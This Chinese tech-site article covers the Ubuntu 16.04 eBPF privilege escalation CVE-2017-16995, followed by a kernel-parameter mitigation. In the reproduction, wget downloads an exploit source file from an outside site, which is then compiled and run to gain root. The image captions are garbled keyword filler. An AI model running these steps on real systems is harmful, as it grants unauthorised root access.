加入收藏 | 设为首页 | 会员中心 | 我要投稿 好传媒网 (https://www.haochuanmei.com/)- 科技、建站、经验、云计算、5G、大数据,站长网!
当前位置: 首页 > 服务器 > 搭建环境 > Linux > 正文

开发者忘记打补丁?新版Ubuntu高危提权漏洞

发布时间:2022-11-03 15:31:03 所属栏目:Linux 来源:网络
导读: 近日,有网友发布消息称ubuntu最新版本(Ubuntu 16.04)存在高危的本地提权漏洞,漏洞编号为CVE-2017-16995。小编好奇就对此漏洞进行了一番研究,该漏洞存在于调用eBPF bpf(2)的Linux内核系

近日,有网友发布消息称ubuntu最新版本(Ubuntu 16.04)存在高危的本地提权漏洞,漏洞编号为CVE-2017-16995。小编好奇就对此漏洞进行了一番研究,该漏洞存在于调用eBPF bpf(2)的Linux内核系统中,当用户提供恶意BPF程序使eBPF验证器模块产生计算错误,导致任意内存读写问题,低权限用户可使用此漏洞获得管理权限。

意思的是linux漏洞,这个漏洞在老版本中已经得到修复,然而最新版本中仍然可以被利用,难道开发人员忘记打补丁了?不管怎样,在漏洞得到修复前,该漏洞依然处于0day状态,不得不重视!

影响范围

经笔者测试 Ubuntu 16.04.1~16.04.4 均存在此漏洞

漏洞复现过程如下,接下来跟随小编一起看下去吧!

进入实验环境访问如下地址:ichunqiu.com/course/61487

笔者在自己的阿里云服务器上进行的复现,版本如下:

linux漏洞日上百鸡_linux漏洞_linux漏洞检测工具

首先新建一个普通权限用户,配置默认为空即可

linux漏洞日上百鸡_linux漏洞检测工具_linux漏洞

我们使用su arch3r切换到新建的普通用户下,cd至/tmp目录,然后下载网友提供的EXP文件,链接如下:cyseclabs.com/exploits/upstream44.c

使用wget命令:

wget http://cyseclabs.com/exploits/upstream44.c

直接下载至/tmp目录下(/tmp目录权限较低,一般情况下提权文件放在此目录不存在权限不足问题)

linux漏洞日上百鸡_linux漏洞_linux漏洞检测工具

接下来开始编译该文件,编译命令修改命令如下:

gcc -o upstream44 upstream44.c

linux漏洞_linux漏洞检测工具_linux漏洞日上百鸡

得到可执行文件upstream44

最后,执行刚刚编译后的文件,成功提升至root权限。

linux漏洞日上百鸡_linux漏洞_linux漏洞检测工具

缓解措施

虽然官网暂时未发布补丁升级方案,但是可以通过修改内核参数来限制普通用户使用bpf(2)系统调用的方式以规避风险。

修改命令如下

echo 1 > /proc/sys/kernel/unprivileged_bpf_disabled

我们运行该命令后,再切换至普通用户执行EXP查看效果

linux漏洞日上百鸡_linux漏洞检测工具_linux漏洞

可以看见报错:

error: Operation not permitted   //操作不被允许。

Ubuntu的用户群体很大,而本次漏洞尚未得到修复,建议大家在对风险进行评估后,先采用紧急的方法确保安全,然后坐等Ubuntu官网发布补丁,及时更新!

参考链接

cyseclabs.com/exploits/upstream44.c

arbitrary read+write via incorrect range tracking in eBPF

Ubuntu本地提权攻击预警 - 3

(编辑:好传媒网)

【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容!